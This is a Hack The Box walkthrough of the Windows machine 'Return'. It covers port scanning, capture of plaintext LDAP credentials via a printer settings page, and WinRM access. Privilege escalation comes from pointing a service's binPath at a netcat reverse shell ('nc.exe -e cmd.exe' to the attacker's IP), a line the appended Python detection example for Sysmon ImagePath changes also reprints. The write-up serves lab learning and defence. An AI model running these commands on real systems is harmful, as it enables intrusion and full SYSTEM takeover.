Return
October 21, 2025

Created by: MrR3boot
Page: Hack The Box
Difficulty: Easy
OS: Windows

Enumeration

I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports:

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.108 -oG scan
    /opt/extractports scan
    nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49697 -sCV 10.10.11.108 -oN ports

From the scan, I discovered the domain return.local and added it to my /etc/hosts file. Using dig, I enumerated subdomains:

    dig any @10.10.11.108 return.local

Initial Access (Web Enumeration)

Within the website’s settings, I found a configuration containing a server address, port, username, and password. I modified the server address to point to my machine and the port to 80. I set up a local web service to capture incoming requests and clicked the update button. This exposed the credentials in plaintext.

I verified the credentials using netexec:

    netexec ldap 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

With valid credentials, I connected via WinRM and retrieved the first flag:

    evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

Privilege Escalation

I enumerated the user’s permissions and group memberships:

    whoami /all

As a member of the Server Operators group, the user can modify a service's binary path, and I exploited that. I configured the VMTools service to execute a reverse shell:

    sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"

I then restarted the service:

    sc.exe stop VMTools
    sc.exe start VMTools

This granted me a shell as NT AUTHORITY\SYSTEM, allowing me to retrieve the root flag.
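
A defender-side check for the service binary path change described under Privilege Escalation, as an added example that is not part of the original write-up: a service's binPath is stored as the ImagePath registry value, so the code scans Sysmon Event ID 13 (registry value set) records for ImagePath values whose executable sits outside the usual install directories. The events are constructed samples reduced to three fields, and the trusted-directory list and function names are assumptions of this example.

```python
import re

# Directories where service binaries are expected (assumption for this example).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
IMAGEPATH_RE = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)

# Constructed sample records (not real logs); field names follow Sysmon Event ID 13.
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath", "Details": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"'},
    {"EventID": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\Start", "Details": "DWORD (0x00000002)"},
    {"EventID": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath", "Details": r"%SystemRoot%\System32\spoolsv.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath", "Details": r"C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"},
    {"EventID": 12, "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools", "Details": ""},
]

def service_executable(image_path):
    """Return the lowercased executable portion of a service ImagePath value."""
    value = image_path.strip()
    if value.startswith('"'):
        exe = value[1:].split('"', 1)[0]          # quoted path: take text up to closing quote
    else:
        m = re.match(r"(.+?\.exe)(\s|$)", value, re.IGNORECASE)
        exe = m.group(1) if m else value.split(" ", 1)[0]
    exe = exe.lower()
    # Normalise the common SystemRoot spellings used in ImagePath values.
    for alias in ("%systemroot%\\", "\\systemroot\\"):
        if exe.startswith(alias):
            exe = "c:\\windows\\" + exe[len(alias):]
    return exe

def suspicious_imagepath_changes(events):
    """Return (service, new_value) for ImagePath writes outside trusted directories."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue
        exe = service_executable(ev.get("Details", ""))
        if not exe.startswith(TRUSTED_PREFIXES):
            findings.append((m.group(1), ev["Details"]))
    return findings

if __name__ == "__main__":
    for service, value in suspicious_imagepath_changes(SAMPLE_EVENTS):
        print(f"ALERT service={service} new ImagePath={value}")
```

A value that launches an interpreter from under C:\Windows passes the directory check, so in practice pair it with a per-service baseline of known-good ImagePath values.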